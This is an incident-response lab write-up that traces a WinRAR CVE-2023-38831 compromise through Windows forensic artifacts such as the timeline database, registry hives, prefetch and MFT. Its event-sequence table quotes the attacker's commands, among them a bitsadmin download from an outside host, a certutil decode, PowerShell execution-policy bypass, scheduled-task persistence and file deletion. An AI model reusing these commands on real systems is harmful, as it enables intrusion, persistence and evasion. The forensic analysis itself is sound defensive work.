SpottedInTheWild Lab Writeup

SpottedInTheWild Lab Writeup ============================== # Scenario You are part of the incident response team at FinTrust Bank. This morning, the network monitoring system flagged unusual outbound traffic patterns from several workstations. Preliminary analysis by the IT department has identified a potential compromise linked to an exploited vulnerability in WinRAR software. As an incident responder, your task is to investigate this compromised workstation to understand the scope of the breach, identify the malware, and trace its activities within the network. ## [Lab](https://cyberdefenders.org/blueteam-ctf-challenges/spottedinthewild/) Link # Solution Firstly, I am not going to deal with the challenge with a Q & A, I Will go to an investigation, then will answer the questions lastly. Lets go to mount the .vhd with ArsenalImageMounter, you know asking why not FTKImager, that is because FTK do not mount Volume Shadow Copies, just to be in safe zone, Use it. ![image](https://hackmd.io/_uploads/rkCOPRYhp.png) So, How to start?? If you ask me this Q, I would like to go my favorite artifact which is **Windows 10 Timeline** (incase Win10 and above) to know the attacker's activity on the system. **Location :**\AppData\Local\ConnectedDevicesPlatform\L.Administrator\ActivitiesCache.db So when I go to the location , I see that the .db file was missing, That's Weird, This is not a normal attacker as he know this artifact and deleted it, but I saw that there is a VSS in our acquisition, lets go to that location, and here is our file ![image](https://hackmd.io/_uploads/ryBPjCKh6.png) Tool :From Eric's Tools **WxTCmd** & Admin Prev ``` WxTCmd.exe -f E:\VSS1\Users\Administrator\AppData\Local\ConnectedDevicesPlatform\L.Administrator\ActivitiesCache.db --csv C:\Users\20100\Desktop\chal\ ``` ![image](https://hackmd.io/_uploads/Skocd0t3T.png) Now We See that our pivot point is **Telegram**, when you go the `Telegram Destop` location, you will find the .rar file. **Bretty Cool.** **Telegram Execution , Powershell Execution , WinRaR , SANS SEC401.rar , Cmd.** We Will keep in mind the timeline as we will check it later. Well, I will assume that there was no **ActivitiesCache.db** so I will go to Registry UserAcivity (NTUSER.DAT) to see what did the user do in our system. So, I will load NTUSER.DAT to Registry Hive and make sure to load the Transaction Logs **ntuser.dat.LOG***. We Will check **RecentDocs** then will export from export button to open it in Excel. **Location :** NTUSER.DAT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs ![image](https://hackmd.io/_uploads/rJuA7yq3p.png) - As we see Telegram Desktop Folder was opened indicating that the attacker downloading the rar file from it, also the Mru Position shows that SANS SEC401.rar file was last opened in `07:34:16` which is nearly equal the time form **Win10 TimeLine** artifact with 3 seconds before. That's Good for now. - Lets go to know what is the attacker's Execution Activity on the system (UserAssist,Amcache,ShimCache,Prefetch,Bam/Dam) # Program Execution Activity **1- UserAssist** [ GUI Program launched in Windows] **Location:** NTUSER.DAT\\Software\\Microsoft\\Windows\\Currentversion\\Explorer\\UserAssist\\{GUID}\\Count ![image](https://hackmd.io/_uploads/SkfH6Jc26.png) - as usual export it from registry for easy anaysis with excel. ![image](https://hackmd.io/_uploads/Bygq5VecnT.png) ![image](https://hackmd.io/_uploads/BykTVgc2a.png) - It seemed that the powershell was last executed at 9:02:52 PM, okay, every thing will get clear when we do SuperTimeLine, Just don't Worry. **2- ShimCache** **Location:** SYSTEM\\CurrentControlSet\\Control\\SessionManager\\AppCompatCache\\AppCompatCache - When I go to Load SYSTEM Hive, It wasn't there, so just go to VSCto get it. - After Checking it it has no data for the time the attack happened, that makes sense as the simcache only contains Executables that provides compatibility for older software running in newer versions of windows , or visible in windows explorer while the user interacting with the windows, and that indicates that the attacker didn't run any malicious exe file at any time of the attack duration. **3- Amchache** **Location :** \Windows\AppCompat\Programs\Amcache.hve - It is deleted so, you will find any item deleted in VSC. Load it in Registry with it's transaction Logs and Parse it with AmcacheParser. Opps, Nothing There. **3- Bam** (Background Activity Moderator) **Location:** SYSTEM\\CurrentControlSet\\Services\\bam\\UserSettings\S-1-5-21-3703689867-555221776-1578950957-500 ![image](https://hackmd.io/_uploads/ry-UCx9n6.png) - Telegram Run In 2/2/2024 6:30:18 PM matches the time the telegram run from WIn10 TimeLine. Cmd.exe Run In 2/3/2024 9:04:03 PM. **4-Prefetch** - Date/Time . exe was first executed = Creation date of .pf file (~-10 seconds) - Date/Time • exe last executed = Last modification date of .pf file (~-10 seconds) = Last execution time also embedded in .pf file **Location:** \Windows\prefetch - I go to C\Windows\prefetch there was 241 item, and in \VSS1\Windows\prefetch there was 29 item, so i will parse both of them, so that I don't miss any thing,[Don't try to copy one the folder to another] - I will parse them with PECmd.exe from Eric's tools. ``` PECmd.exe -d 'E:\C\Windows\prefetch\' --csv C:\Users\20100\Desktop\chal\Prefetch\ ``` ![prefetch](https://hackmd.io/_uploads/rJxv97c26.png) So, Just keep in mind that the created and modified time will be -10 seconds. As you see that there are many executoins with a Consecutive sequence, as we saw in Win10 TimeLine artifact. **Lastly before go to Logs**, I will go for Shell-Items to make sure that every single step we did is right. **Shell Items** [Shortcut Files (.lnk), Jumplists, ShellBags] **1- LNK Files** 1. The creation date of the file is the first time a file that has that exact name has been opened regardless of location. 2. The last modification date of the file is the last time a file of that exact name has been opened regardless of location. **Location :** C: \\Users \\<USer>\\AppData\\Roaming\\Microsoft\\Windows\\Recent Using LECmd on the 2 LNK files exsits target file & parent Directory of the Target File. LECmd.exe -f "E:\C\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\SANS SEC401.rar.lnk" ![image](https://hackmd.io/_uploads/Sk5KyEchp.png) ![image](https://hackmd.io/_uploads/ByoFZEq3a.png) **2- Jumplists** There are 2 Folders for this artifact - AutomaticDestinations (contain information about recently accessed applications and files) - CustomDestinations(created with specific development information from the application developer) ![image](https://hackmd.io/_uploads/Syi1NVq3p.png) ``` JLECmd.exe -d E:\C\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\ --csv C:\Users\20100\Desktop\chal\jumplists ``` 1. the last modification time, which is when the entry was added to the JumpList. 2. Target Creation Time = First time item added to the ApplD file. First time of execution of application, with the file open. 3. Target Modification Time = Last time item added to the AppID file. Last time of execution of application, with the file open. ![image](https://hackmd.io/_uploads/H1rbtL9hT.png) **3- ShellBags** - Information is available only for folders that have been opened and closed in Windows Explorer at least once. - To get all Shellbags information, we now need to parse both NTUSER.dat (DESKTOP) and USRCLASS.dat (EXPLORER) for each user account. - We will use ShellBagExplorer From Eric's Tools. - After Loading the Hives we can extract data as Excel File for better Analysis. ![image](https://hackmd.io/_uploads/r1Q6zDqnT.png) Now we map all Attacker's Activities on the system, Don't Worry, Everything well be clear when we explore the final timeline, So lets go to know what happen after the attacker download the .rar file. ### Tasks - we saw in prefetch that SCHTASK.EXE run in 07:34:40 the time after .rar file was opened so lets go to **SOFTWARE** Registry Hive to see Tasks **Location:** SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks - After exporting the entries and checking the time `07:34:40` we see **whoisthebaba** was created that time. ![image](https://hackmd.io/_uploads/HJbYSni2T.png) So, The OverAll TimeLine till now is : ![image](https://hackmd.io/_uploads/SkuKlhsnT.png) # **SANS SEC401.rar** Malicious File - I moved it to my isolated machine to see what happens. ![image](https://hackmd.io/_uploads/S1FTbron6.png) - `SANS SEC401.pdf` file is a cmsd file, after knowing the version of Winrar [5.3 beta], we will search for the CVE to know it. ![Screenshot 2024-02-26 222703](https://hackmd.io/_uploads/Bku5ksn36.png) `CVE-2023-38831` -- Poc is [here](https://github.com/HDCE-inc/CVE-2023-38831). - SANS SEC401.pdf a handle to `conhost.exe` to execute bitsadmin.exe to download `amanwhogetsnorest.jpg` and put it in `C:\Windows\Temp\` - When you go to the jpg location, you will not find it, the attacker deleted it, that's takes us to parse MFT,LogFile ,J files. ### 1- $MFT - MFT keeps track of all files on the volume **Location:** C :\\$ MFT **Tools :** MFTECmd.exe `MFTECmd.exe -f 'E:\C\$MFT' --csv C:\Users\20100\Desktop\chal\MFT&LogFile\` - I filterd with the time and some extensions to narrow my scope ![image](https://hackmd.io/_uploads/BJANh2jhT.png) - When I see `amawhogetsnorest.jpg` the time it was created on system was weird as it was before the `BITSADMIN.EXE` run time, maybe the attacker run the script twice, deleted it, and run it again, but the name of the file was first recorded by MFT at that time, so maybe the MFT did not record second creation time, or somthing happened I actually don't know , but the MFT changed tha last record time in `07:34:37` which matchs the scenario. ![image](https://hackmd.io/_uploads/SJh2chjhT.png) - So, I go to check the file using system journaling, and I tracked the file with it's `Entry Number = 107251`, I found that the file started downloading at `07:34:23` and ended at `07:34:40` which matches the context. ![$J & $MFT](https://hackmd.io/_uploads/B1bcTI0Jkg.png) - Then, we noticed that there are some files after that time [normal.zip, EventLog.ps1,z.ps1,run.ps1,run.bat] - `amawhogetsnorest.jpg` dropped Eventlog.ps1, run.bat, run.ps1 - So, why only those three files? - as when I checked the location of `run.ps1`, `run.bat`, i found them on the system, and Eventlog.ps1 which his job is tampering the events as when we go to check them in the comming section, we will notice that many events are missed. `normal.zip`, `z.ps1`, are not on the system, even when we parse $LogFile we will know that they are deleted. ### 2-$LogFile - Provide information based on the actions performed by users, system (Deletion,Creation,Renaming,....) **Location:** C :\\$LogFile **Tools:** NTFS Log Tracker - You Can search how to use it. - we need to know what happened to `EventLog.ps1`,`amanwhogetsnorest.jpg` files as we can't find them on the system. - when I search for the jpg file, LogFile didn't track it when it was deleted, but it tracks `EventLog.ps1` deletion at `2024-02-03 07:38:01`,which we assume that this deletion after the script was run by poweshell. - After we run the malicious file `SANS SEC401.pdf` in our isolated machine, everything is clear now, `z.ps1` is used for unzipping any zip file under `\windows\temp\` `run.ps1` is used for reconnisance. ![image](https://hackmd.io/_uploads/rkFLWCsnT.png) | Events in secqunce | |:------------------------------------------------------------------------------------------------------------------------------------------------ | | 1. Download `amanwhogetsnorest.jpg` | | `bitsadmin /transfer Nothing /download /priority normal http://172.18.35.10:8000/amanwhogetsnorest.jpg C:\Windows\Temp\amanwhogetsnorest.jpg ` | | 2. Use certutil to decode `amanwhogetsnorest.jpg` to `normal.zip` which dropped Eventlog.ps1, run.bat, run.ps1 | | `certutil -decode amanwhogetsnorest.jpg normal.zip 1>nul` | | 3. open cmd to run z.ps1 from powershell | | | 4. create a task \whoisthebaba | | | 5. delete z.ps1 | | `cmd /c "powershell -NOP -EP Bypass C:\Windows\Temp\z.ps1"` | | 6. delete `amanwhogetsnorest.jpg` | | `del amanwhogetsnorest.jpg ` | | 7. delete `normal.zip` | | `del normal.zip ` | | 8. create task `\whoisthebaba` which runs `run.bat` | | `schtasks /create /sc minute /mo 3 /tn "whoisthebaba" /tr C:\Windows\Temp\run.bat /RL HIGHEST` | | 8. open cmd to run `Eventlog.ps1` from powershell | | `cmd /c "powershell -NOP -EP Bypass C:\Windows\Temp\Eventlog.ps1"` | | 9. delete `Eventlog.ps1` | | `del Eventlog.ps1` | - I will stop in analysis at this point as we nearly know everythig, as the malicious dropper is `SANS SEC401.pdf`, `amanwhogetsnorest.jpg` decoded to `normal.zip` which contains malicious powershell scripts 1. `run.ps1` : did a reconnaissance on active hosts, also you will find it in the github repo. ![Screenshot 2024-02-26 215032](https://hackmd.io/_uploads/Hk2_rjn2p.png) 2. `run.bat` the task responsible for running `run.ps1`. 3. `Eventlog.ps1` : cleared the logs. - I think no need to check eventlogs as there is actually `Eventlog.ps1` which it must had tampered with these events, so we won't get alot of data form them. #### TimeLine Files will be [here](https://github.com/M4shl3/Home) #### I don't need to write the answers, as they should now are clear for you :exploding_head: . #### Also, I wrote this blog 8 months ago, am Sure that there should be more in this blog, but I deleted the Image and feel lazy to reprocess again.